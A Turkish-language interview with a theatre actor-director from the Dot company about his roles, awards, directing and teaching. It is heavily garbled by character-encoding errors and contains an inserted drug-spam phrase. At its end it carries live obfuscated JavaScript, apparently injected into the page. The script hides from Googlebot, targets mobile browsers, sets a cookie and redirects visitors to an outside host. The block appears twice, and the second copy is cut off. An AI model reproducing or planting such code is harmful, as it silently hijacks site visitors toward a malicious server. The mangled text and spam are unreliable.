Ai??apAi??mAi??zda ai???devised theatreai??? Ai??rneAYi yapmAi??AY olduk.

NasAi??l ai???Supernova/Beautiful Bournotai???da boks yapmayAi?? Ai??AYrendiysen, A?Ai??A?ncA? sezonuna giren ai???Ai??ki KiAYilik Yazai???da da gitar Ai??almayAi?? Ai??AYreniyorsun. Hakan GA?ndayai??i??Ai??n ai???Malafaai???sAi?? iAi??in de kuyumcularAi??n Ai??zel jargonunu Ai??AYrenmiAYtin. Her oyunla, insanAi??n kendine bir AYey katmasAi?? mA?thiAY. ArtAi??k rollerin kendileri deAYil, rollerin Ai??AYreteceAYi AYeyler seni heyecanlandAi??rAi??yor.
Kesinlikle! Ai??AYimi yaparken beni asAi??l heyecanlandAi??ran AYey de o aslAi??nda, evet. Bir AYey oynamanAi??n dAi??AYAi??nda hep yeni bir AYeyler Ai??AYrenmek, hayatAi??ma yeni AYeyler katmak, yeni AYeyler keAYfetmekai??i?? Bu oyunla Ai??rneAYin gitar Ai??alAi??p, AYarkAi?? sAi??ylerken sesimi daha bilinAi??li olarak kullanmaya baAYladAi??m. BunlarAi??n hepsi tabii cebinize attAi??AYAi??nAi??z birer artAi??.

Mutlu deAYil umutlu diye anlattAi??AYAi??nAi??z David Creigai??i??in ai???Ai??ki KiAYilik Yazai???Ai??nda Alelade Bobai??i??u, canlandAi??rAi??yorsun. ai???Tiyatro yapmayAi??p ingilizce Ai??AYretmeni olarak devam etseydim muhtemelen aynAi?? Ai??Ai??kmazda olurdumai??? diyorsun. Oyunda gitar Ai??almayAi?? Ai??AYrenmen de oyunun mesajAi??nAi?? kendi A?zerinden gerAi??ekleAYtirmeni saAYlamAi??AY. Sanat bize ne gA?zel AYeyler yapAi??yor ve yaptAi??rAi??yor.
Ben pek korkan biri deAYilim; aksine Ai??ok da meraklAi??yAi??mdAi??r. Bana heyecan verir hep yeni AYeyler. Yapamam, edemem demem; hep denemekten yanayAi??m. Evde oturmaktansa; deneyip baAYarAi??sAi??z olmak daha iyi. Her zaman da kararlarAi??m bu yAi??nde oldu. Beni orada bekleyen her AYey bana heyacan verir. KAi??s kAi??s oturmak iAi??in gelmiyoruz bence bu hayata. Yoksa o kadar uzun sA?re yaAYamanAi??n da hiAi??bir anlamAi?? yok.

Oyunun, gA?nA?mA?z insanAi??nAi??n parayla iliAYkisini sorguluyan o parayAi?? daAYAi??tma sahnesi senin en sevdiAYin anlardan birisi ama bunu anladAi??AYAi??mAi??z anlamda ai???romantizmeai??? sapmadan baAYka bir yere basarak sAi??ylemesi gA?zel.
Belli bir yaAYanmAi??AYlAi??ktan sonra, belli bir empati seviyesinden sonra, artAi??k o karakterin yaAYAi?? kaAi?? olursa olsun, milliyeti ne olursa olsun, iAi??inde bulundurduAYu duyguyu anlayabiliyorsun. DolayAi??sAi??yla o Ai??Ai??kAi??AYsAi??zlAi??AYAi??, nihayetinde birilerine tutunup hayatta kalma Ai??alAi??AYmalarAi??nAi?? ben Ai??ok net anlayabilirim. Bu Ai??ok gA?Ai??lA? bir AYey, insanAi??n birbirine verdiAYi gA?Ai?? muazzam bir AYey. DA?AYerken sana uzanan eli de tutup oradan birlikte Ai??Ai??kmaya Ai??alAi??AYmak mA?thiAY bir AYey. Ai??nsan Ai??ok gA?Ai??lA? bir varlAi??k. Hele de bir araya geldiAYimizde mucizeyi yaratabiliyoruz. Ai??nsanAi??n kendi gA?cA?nA? hem mental hem de fiziksel olarak unutmamasAi?? gerekiyor. AAYk ya da sevgi bize bahAYedilen en bA?yA?k gA?Ai??lerden. Bizim hayatta kalmamAi??zAi?? saAYlayan bir AYey. Bunu hiAi?? romantik bir taraftan sAi??ylemiyorum. Kalbimizi kaybedersek gerAi??ekten hiAi??bir anlamAi?? yok bu hayatta yaAYamamAi??n. Ai??ok Ai??nemli bir AYeyden bahsediyor oyun. Ai??ki insan dA?nyayAi?? deAYiAYtirebilir. HiAi?? de bA?yA?k bir cA?mle deAYil bu. UmarAi??m bunu yaAYamAi??AYAi??zdAi??r Ai??oAYumuz.

Ai??ki KiAYilik Yaz / Dot

Oyun Ai??yle bir zamanda sahnelendi ki umut sAi??zcA?AYA?ne tutunmak iAi??in hAi??zAi??r gibi yetiAYti ve sana 19. Afife Tiyatro Ai??dA?lleri’nde En Ai??yi Erkek Oyuncu ve Tiyatro EleAYtirmenliAYi BirliAYi (TEB) YAi??lAi??n Erkek Oyuncusu ve Sadri AlAi??AYAi??k Ai??dA?llerini getirdi. Bir anda belki dA?nyanAi??n en iyi oyuncusuna dAi??nA?AYmedin ama baAYarAi??nAi??n fark edilmesi de Ai??ok gA?zel oldu bence.
Elbette ki Ai??yle. Ai??dA?l sizi bir anda inanAi??lmaz yetenekli bir oyuncu ya da bambaAYka biri yapmAi??yor. Siz ertesi gA?n uyandAi??AYAi??nAi??zda, hayatAi??nAi??za kaldAi??AYAi??nAi??z yerden devam ediyorsunuz. Ben zaten yaptAi??AYAi??m iAYi Ai??ok seviyorum. BugA?ne kadar oynadAi??AYAi??m tA?m adamlarAi?? da Ai??ok severek oynadAi??m. Bu kadar gA?zel, bu kadar zorlayan roller oynamak zaten benim iAi??in Ai??dA?l. MesleAYe olan baAYAi??mAi?? daha da gA?Ai??lendiren bir AYey. OtomatiAYe baAYlamadan, yeni AYeyler yapmaya Ai??alAi??AYmak beni hep dinAi?? ve taze tuttu bu meslekte. Yine de ne olursa olsun, dA?AYA?ndA?AYA?nA?zde Afife bu A?lkedeki en Ai??nemli tiyatro Ai??dA?lA?. Hepimizin nasAi??l olur acaba oraya Ai??Ai??kAi??p da o Ai??dA?lA? almak diye bir dA?AYA?nmA?AYlA?AYA?mA?z vardAi??r. Ben yaptAi??AYAi??m hiAi??bir AYeyi Ai??dA?l iAi??in yapmadAi??m. Bundan sonra da yapmayacaAYAi??m zaten. O, iAi??indeki samimiyeti baAYka tarafa gAi??tA?ren bir AYey. HayatAi??mdaki en gA?zel birkaAi?? anlardan TEB, Sadri AlAi??AYAi??k, Afife Ai??dA?llerindeki o anlar.

Ai??yi oyunculuk sadece kendine Ai??alAi??AYAi??lan bir AYey deAYil. Oyun, kendini gAi??stermen iAi??in sana da Gizem (Erdem)ai??i??e de AYahane bir fAi??rsat vermiAYken, Ai??ne Ai??Ai??kmayan, dengeyi bozmayan ve ai???partnerai???ine yer aAi??an bir ai???oyunculuk dA?sturuylaai??? oynuyorsun.
Ben izleyici olarak bir oyuncunun kendini diAYerlerinden daha farklAi?? bir yere koymasAi??ndan, Ai??ne Ai??Ai??kmaya Ai??alAi??AYmasAi??ndan ve gol atmaya Ai??alAi??AYmasAi??ndan nefret ediyorum ve o kiAYiyi izleyememeye baAYlAi??yorum. DolayAi??sAi??yla kendime de, ai???asla bAi??yle bir AYey yapma, tek kiAYilik bir oyun bile olsa, bu bir ekip iAYi, hikayenin neye ihtiyacAi?? varsa onu yapai??? Cost of arimidex for a month diyorum. Gol atmaya Ai??alAi??AYmak bana Ai??ok bA?yA?k bir ahlA?ksAi??zlAi??k, yapAi??lan iAYe Ai??ok bA?yA?k bir saygAi??sAi??zlAi??k, seyirciye Ai??ok bA?yA?k bir terbiyesizlik gibi geliyor. Ben hiAi??bir zaman tribA?nlere oynamayAi?? seven bir oyuncu olmadAi??m. Daha Ai??ok insanAi??n gAi??nlA?nA? Ai??elmek iAi??in bir AYeyler yapmaya Ai??alAi??AYmadAi??m. Bunu sahnede gAi??rdA?AYA?m zaman da Ai??ok Ai??irkin buluyorum ve ai???sen ne yapAi??yorsun, niye bunu yapAi??yorsunai??? diye sarsmak istediAYim Ai??ok oyuncu oluyor.

Dotai??i??ta oyuncu, Ai??evirmenAi??ve yAi??netmen olarak Ai??alAi??AYmaya devam ediyorsun. 2011ai??i??de ai???Orphans/Ai??ksA?zlerai??? ile yAi??netmenliAYe baAYlAi??yorsun. Dennis Kellyai??i??nin Ai??ok gA?zel yazdAi??AYAi??, anlattAi??AYAi?? bu hikayeyi rejiyi boAYmadan, sakin bir tavAi??rla sahneliyorsun.
Daha Ai??nce Ai??alAi??AYtAi??AYAi??m okullarda Ai??ngilizce ya da TA?rkAi??e oyunlar Ai??alAi??AYtAi??rdAi??m Ai??AYrencilerime ama yAi??netmenlik bambaAYka bir AYey. Yani saAYdan gir, soldan Ai??Ai??k demek deAYil; oyunun fikrini yorumlamak, burada bir dA?nya kurmak demek. Ve o yarattAi??AYAi??n dA?nyaya hem oyuncuyu hem seyirciyi inandAi??rabilmek, ikna edebilmek aynAi?? zamanda. DolayAi??sAi??yla gAi??rA?ndA?AYA? kadar kolay bir AYey olmadAi??AYAi??nAi??, iAYin iAi??ine girince daha iyi anlAi??yorsun. Ben ai???Ai??ksA?zlerai???in tekstini Ai??ok severek, Ai??ok heyecan duyarak okumuAYtum. Ai??ok iAYtahAi??m kabarmAi??AYtAi?? ve oynamak istemiAYtim aslAi??nda. Ama bir tA?rlA? sAi??ra gelmedi. O sAi??rada ai???Supernovaai???nAi??n da provalarAi??nAi?? yapmaya devam ederken, bu teksti ne kadar Ai??ok sevdiAYimi bilen Murat abi (Daltaban) bana bu oyunu yAi??netmemi sAi??yledi. Hay Allah ben bunu oynamak istiyordum ama iAYin iAi??inde Gizem Erdem var, Ai??brahim Selim var, ekip AYahane. Ben Ai??ok gurur duyuyorum ai???Ai??ksA?zlerai??? ile. Hem naif, hem yA?ksek sesle baAYAi??rmayan, hem de okurken yaAYadAi??AYAi??m hissi seyirciye aktarabildiAYimiz bir oyun olduAYunu dA?AYA?nA?yorum.

2013ai??i??te sahnelenen Ali Taylorai??i??Ai??n ai???Overspill/YA?ksekai???oyunuyla yAi??netmenliAYe devam ediyorsun. Uyarlayan (bu Ai??zellikle yazarAi??n isteAYi), Ai??eviren, yAi??neten sensin. BAi??ylece sahiplendiAYin, fazlaca hakim olduAYun bir tekste en doAYru yorumu katmak kalAi??yor geriye, bu bA?yA?k avantaj, deAYil mi?
O teksti ben buldum, okudum, Ai??ok sevdim. HiAi?? oynamayAi?? dA?AYA?nmedim; direkt yAi??netmeyi dA?AYA?ndA?m. Sonra Ai??evirdim, Murat abiye okudum, O da Ai??ok sevdi oyunu. Sonra genAi?? bir oyuncu ekibi kurduk. Oyunun yazarAi?? Ali Taylor zaten Ai??yle bir Ai??neride bulunmuAY. Bunu kendi coAYrafyanAi??za uyarlarsanAi??z daha iyi olur demiAY. Zaten Edinburgh sokaklarAi??ndan geAi??en bir oyun seyircinin gAi??zA?ne o kadar gelmez. Biz bunu bayaAYAi?? Ai??stanbul, BeyoAYlu, Balat, Esentepe, Seyrantepeai??i??de geAi??en bir oyun olarak kurduk. KiAYileri bizim bildiAYimiz kiAYilere uyarladAi??k. Daha Ai??ok oynanmasAi??nAi??, daha Ai??ok seyirciye ulaAYmasAi??nAi?? tabii ki Ai??ok isterdim. AzAi??yle tuhaf bir durum var. Bize yAi??llardAi??r neden yerli oyun oynamAi??yorsunuz diye sorarlar hem eleAYtirmenler, hem seyirciler. Evet yabancAi?? bir yazarAi??n oyunuydu bu ama ben uyarladAi??m, alAi??n iAYte size Ai??stanbulai??i??da geAi??en son derece yerli bir oyun. Ama ne tiyatro yazarlarAi??ndan, ne seyirciden gerekli desteAYi gAi??rdA?AYA?ne inanAi??yorum. E yaptAi??k, neden destek olmuyorsunuz o zaman? Ai??yle soru sormakla olmuyor.

Yine yAi??netmenliAYini yaptAi??AYAi??n bir diAYer oyun ai???Yeni Ai??AYretmenimiz Bir Canavarai???. Ai??ocuklara tiyatro yapmak bence bambaAYka bir iletiAYim. Ai??A?nkA? Ai??ocuk gAi??zA? en doAYru, en gerAi??ek gAi??zai??i??SaAYlamamAi??zAi?? orada yapabiliriz.
Muazzamai??i?? Bana Ai??ok AYey Ai??AYretiyor Ai??ocuklarla Ai??alAi??AYmak. Daha yeni bitti son atAi??lyem. Tekrar olacak inAYallah. Bundan bAi??yle sadece Ai??ocuklarla Ai??alAi??AYacaAYAi??m bu tA?r atAi??lyelerde. Bu bana daha etik geliyor. Bir de benim pedegojik formasyonum da var almAi??AY olduAYum eAYitimden dolayAi??. O da hep benim iAi??imi rahatlatan, su serpen bir AYey. YAi??llardAi??r onlarla Ai??alAi??AYAi??yorum ve bu bana her zaman Ai??ok iyi geliyor.

Bir de 2013ai??i??de Craftai??i??ta oyunculuk dersleri vermeye baAYlamAi??AYtAi??n. Orada da baAYka enerjiler, baAYka bakAi??AYlar var. Sanki, yuvandan Ai??Ai??kAi??p, baAYka iletiAYimlerle, baAYka farkAi??ndalAi??klarla bir alAi??AYveriAYte bulunup, tazelenerek geri dAi??nA?yor gibisin.
Ben Dotai??i??ta oyucuk, yAi??netmenlik ve Ai??evirmenlik yapAi??yorum. Craftai??i??ta eAYitmenlik yaptAi??m. Mamart Tiyatroai??i??da yAi??netmenlik yapAi??yorum. Ekibi oluAYtururken Feri Baycu GA?ler ile birlikte yol alAi??yoruz orada. Her yerde bir AYey yapAi??yor imajAi?? yaratmamak iAi??in aldAi??AYAi??m birAi??ok teklifi deAYerlendirmedim ben. AzAi??yle dA?AYA?nA?yorum: The Beatles gibi bir aradasAi??nAi??z, albA?mler yapAi??yorsunuz, sonra kendi yolunuzu bulmak iAi??in Ai??Ai??kAi??yorsunuz, bir solo albA?m yapAi??yorsunuz ve tekrar geri dAi??nA?yorsunuz. Bu bana yenilenmek gibi geliyor. Ne olursa olsun, Ai??ok dinamik bir ekip olmamAi??za raAYmen, sA?rekli aynAi?? ekip, bir arada Ai??alAi??AYtAi??AYAi??nAi??z sA?rece hem tembelleAYiyorsunuz, hem hantallaAYAi??yorsunuz. Bazen iletiAYiminiz otomatikleAYiyor. O yA?zden de bu aAi??Ai??lmalar, tanAi??AYmalar, baAYkalarAi??yla yapAi??lan Ai??alAi??AYmalar Ai??ok iyi geliyor, yeniliyor beni. Bunlar hep olacak, bundan sonra da olacak.

Edinburgh Fringe Festivaliai??i??ne gidiyorsunuz. Siz aynAi?? zamanda oyunlarAi??nAi?? oynadAi??AYAi??nAi??z Ai??aAYdaAY yazarlarla organik hatta birebir fiziksel baAYlar da kuruyorsunuz. Bu oyunun yazarAi?? David Creig ve “KAi??AY DAi??nA?mA?ai???nA?n yazarAi?? Zinnie Harris gibi. Herkes Zinnie Harrisai??i??in evinde fasA?lye ayAi??klamAi??yor Ai??rneAYin. Onlarla festivalde birlikte oluyorsunuz. Orada tuhaf biAi??imde tiyatro, sanat hayatAi??n kalbine yerleAYiyor.
Uygar dediAYimiz insan formu iAYteai??i?? Bizde sanat hep tukaka olur, lA?ks bir AYey olarak gAi??rA?lA?r, belli bir sAi??nAi??fa ait bir AYey olarak adledilir hep… Ama Ai??yle deAYil, kafada ne dA?AYA?nce varsa sanatla ilgilenen gA?ruhla ilgili, sanatla ilgilendikleri iAi??in zaten Ai??yle bir gA?ruha dAi??nA?AYmA?AYler, ama izleyici olarak ama icra eden, yapan olarak. Elbette hiAi?? kimse sanatla ilgili Ai??yle bir bilinAi??le doAYmuyor. Onlara maruz kalarak, onlarAi?? gAi??zlemleyerek baAYka bir insana dAi??nA?AYA?yor. Ai??nsana dAi??nA?AYA?yor aslAi??nda. Sanattan, spordan, kA?ltA?rden uzak eAYitimsiz bir gA?ruhun da neye dAi??nA?AYtA?AYA?nA? hep birlikte gAi??rA?yoruz zaten.

Mamart Tiyatroai??i??da Neil Labuteai??i??A?n ai???Some Girls/Ai??zel KadAi??nlarai???Ai?? ile Eve Enslerai??i??in ai???Where Have All the Flowers Gone/Nereye Gitti BA?tA?n Ai??iAi??eklerai??? oyunlarAi??nAi?? yAi??nettin. Ne gA?zel ki hayata aynAi?? taraftan bakanlar buluAYabiliyor. Bu sA?reAi??te oyuncularAi??n sana kendilerini rahatlAi??kla, bA?yA?k bir gA?ven duyarak emanet ettiklerini hissettim.
NasAi??l oldu bilmiyorum ama bunu onlardan da duyduAYum zaman Ai??ok mutlu oluyorum. Ai??ok iyi geliyor bana Ai??A?nkA? ben de bir oyuncu olarak kendimi bir yAi??netmene teslim etmenin ne kadar rahatlatan bir his olduAYunu biliyorum. O hissi onlarda da yaratabiliyorsam ne mutlu bana.

Supernova / Dot

Ai??ai???Supernovaai??? ile paralel yAi??netmenlik de yapmaya baAYladAi??AYAi??n dAi??nemde yAi??netmene (Murat Daltabanai??i??a) ai???neden?ai??? deAYil, ai???pekiai??? demenin Ai??nemini kavramAi??AYtAi??n. Her iki tarafta da bulunmak ayrAi??AYtAi??ran deAYil, uzlaAYtAi??ran bir AYey olduAYu iAi??in deAYerli.
Evet, kesinlikle Ai??yle. DediAYim gibi birlikte Ai??alAi??AYmak oyuncu ve yAi??netmen iAi??in bir ikna sA?recidir. Sadece neden demek iAi??in neden derseniz hiAi??bir biAi??imde ilerleyemezsiniz ama uzlaAYmaya Ai??alAi??AYAi??rsanAi??z o zaman iAYte o A?rA?n Ai??Ai??kar ortaya. Onu bana Ai??AYreten bir sA?reAi??ti o tabii ki. Ve iAYte o zaman da iAYte sadece Dotai??i??un deAYil, TA?rk Tiyatro Tarihiai??i??nin de en gA?zel oyunlarAi??ndan biri Ai??Ai??kAi??yor ortaya.

PrAi??miyer yaklaAYAi??rken kabuslar da yaklaAYAi??yor. Replikler unutuluyor, her AYey ters gitmeye baAYlAi??yor. Oyuncular Ai??srarla oynamaya devam ederken seyirci bA?yA?k bir gA?rA?ltA?yle ve hAi??zla terk ediyor salonu. Oyuncuyken mi, yAi??netmenken mi daha Ai??ok gAi??rA?yorsun bu kabuslarAi???
YAi??netmenken o kabuslarAi?? uyanAi??kken, gAi??zA?m aAi??Ai??kken gAi??rmeye baAYlAi??yorum. Oyuncu olarak artAi??k son dAi??nemece girmiAYsek ve artAi??k oyunun hazAi??r olduAYunu dA?AYA?nA?yorsam, kendimin de hazAi??r olduAYunu dA?AYA?nA?yorsam ve hA?lA? oyun seyirciyle buluAYmamAi??AYsa; bende artAi??k tuhaf AYeyler baAYlAi??yor. O artAi??k kabusa dAi??nA?AYA?yor. Acaba yanlAi??AY mAi?? hissediyorum, acaba hazAi??r deAYil miyim sorularAi?? galiba alttan vuruyor. YAi??netmenlik gerAi??ekten yAi??netmek demek, kriz de yAi??netmek demek.

Tekstin fikrini anlatabilecek gAi??rselliAYi arAi??yorsun. Bunu yaparken resim, heykel, dans, mA?zik, teknolojiden yararlanmak istiyorsun. Plastik estetiAYin entelektA?el bir dAi??AYavurumuai??i?? Bunu da tesadA?fen deAYil, bilinAi??le yapAi??yorsun.
Alelade ve Ai??zensiz, sakil bir AYeyin iAi??inde yer almaktansa yer almamayAi?? tercih ederim her zaman.Ai?? Ai??GeldiAYimden beri, on yAi??ldAi??r sadece iAYimi yapAi??yorum. Bazen kafayAi?? yiyorum, bazen yemiyorum, neyse bir sA?reAi?? geAi??iriyorum. Sonra bir yerlerde konservatuvardan genAi?? arkadaAYlarla karAYAi??laAYAi??yoruz, aynAi?? projelerde yer alAi??yoruz. Birlikte bir AYeyler yapAi??yor olmanAi??n heyecanAi??nAi?? onlarAi??n gAi??zA?nde gAi??rdA?AYA?m zaman, ben kendimi hatAi??rlAi??yorum bu sefer. Mesela UAYur Polat benim hocam oldu, dersime girdi. Ben Ai??ok heyecanlandAi??m Ai??A?nkA? benim iAi??in bir fenomen, bir idoldA? UAYur abi. Sonra biz onunla aynAi?? oyunda karAYAi??lAi??klAi?? oynadAi??k. Ya da BA?lent Emin Yarar, onun benim A?zerimdeki etkisinin kA?Ai??A?AYA?nA?n, etrafAi??mdakiAi?? genAi?? arkadaAYlarAi??mda olduAYunu gAi??rA?nce Ai??ok AYaAYAi??rAi??yorum. Ama farkAi??nda deAYilim ben bunun. Demek ki kendi kendine oluAYan bir AYeymiAY bu. O zaman da ben doAYru AYeyler yaptAi??AYAi??mAi?? hissediyorum. GA?zel bir AYey o genAi?? arkadaAYlardan bu geribildirimi almak.

Senin hep her AYeyi yapabilecek bir enerjin var. Ai??Ai??indeki cevher Ai??Ai??plak gAi??zle gAi??rA?lA?yor. Tiyatro oyunculuAYu, yAi??netmenliAYi, Ai??evirmenliAYi, sinema oyunculuAYu, yAi??netmenliAYi, dizi oyunculuAYu, reklam, seslendirme, mA?zik yapmanai??i?? Hepsi birlikte seni zenginleAYtiriyor, renklerini parlatAi??yor. Bu seni deAYerli bir adam yapAi??yor. Ancak hA?lA? Egon Schieleai??i??yi oynamamanAi??n nedenini anlamAi??yorum.
Bilmiyorum, hiAi??bir fikrim yok. Azimdi filmi Ai??ekiliyor, Ai??ok kAi??skanAi??yorum. Azaka bir yana, gA?zel biyografilerin Ai??ekilebildiAYi, filmlerin gA?zel anlatAi??ldAi??AYAi?? bir sinemaya sahip olmayAi?? Ai??ok isterdim. Ama o bizde bir kAi??sAi??r dAi??ngA?. Hep aynAi?? karakterler, hep aynAi?? hikayeler, hep aynAi?? tA?r adamlar, aynAi?? tA?r kadAi??nlar anlatAi??lAi??yor. O yA?zden Ai??ok istediAYiniz gerAi??ek hayat karakteri ya da kurgu karakteri bulmak Ai??ok kolay olmuyor. BulduAYunuzda da dAi??rt elle sarAi??lAi??yorsunuz tabii. Ai??zellikle tiyatro dAi??AYAi??ndaki disiplinler iAi??in bunu sAi??yleyebilirim. UmarAi??m halk bunu seviyor kolaycAi??lAi??AYAi??nAi??n A?stesinden gelebiliriz.

KAi??rkAi??nda genAi?? oyuncu olarak anAi??lmak?
GenAi??lik sadece yaAYla ilgili deAYil, enerjiyle, vizyonla ilgili bir AYey. Kafada genAi?? olmak her zaman iAi??in deAYerli. SanAi??yorum bu kafadaki genel geAi??er imajlarAi??n yansAi??masAi?? ama ben de kendimi 40 yaAYAi??nda gibi hissetmiyorum. Genelde kAi??rk yaAYAi??ndan, belirli bir davranAi??AY biAi??imine uymalarAi?? beklenir. Ben de Ai??ok o kAi??staslara uyan biri deAYilim. KondA?syonum iyi, iyi bakarAi??m kendime, yediAYime, iAi??tiAYime dikkat ederim, sporumu yaparAi??m, hayat enerjim yA?ksektir, karanlAi??k taraflarAi??m yoktur. BunlarAi??n hepsi bana yAi??llarAi?? daha sonra getiren bir AYeye dAi??nA?AYtA?rA?yor. Bundan da mutsuz deAYilim. Ai??ocuk oyununda Ai??rneAYin, genAi?? arkadaAYlarAi??mla Ai??alAi??AYtAi??m. GenAi?? oyuncu olarak anAi??lmak, oyuncu olarak tabii hoAY geliyor kulaAYa ama yAi??llardAi??r bu iAYin iAi??inde olup yazAi??p Ai??izen yazarlarAi??n aslAi??nda tiyatroyu iyi takip etmediAYini daha iyi anlAi??yorsunuz genAi?? oyuncu dediAYinde size. O, onun mesleAYiyle ilgili bir sAi??kAi??ntAi??ya sebep oluyor, benim iAi??in deAYil yani.

Yekta Kopan senin iAi??in ai???TuAYrul TA?lekai??i??i en iyi anlatan AYey, 2008 tarihli belgesel: “Man on Wire/Teldeki Adam”. A?stA?nde yA?rA?yeceAYi teli hep daha yA?kseAYe, daha ulaAYAi??lmaza, daha tehlikeliye, daha akAi??l almaza gerip Ai??lA?mcA?l yA?rA?yA?AYA?nA? orada yapan Phillipe Petit gibi.ai??? demiAYti. Sen de zaten bir rAi??portajAi??nda durursan Ai??lA?rsA?n diyorsun. SanAi??rAi??m ben de seninle ilgili daha doAYru bir tanAi??ma rastlamadAi??m bugA?ne dek.
Ai??ok saAYolsun, ne diyeceAYimi bilemiyorum bAi??yle durumlarda. OkuduAYumda da hem Ai??ok mutlu olmuAYtum hem mahAi??up olmuAYtum.

Ne iyi geldi seninle konuAYmak, hep iyi geliyorai??i?? Ai??ok teAYekkA?rler.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 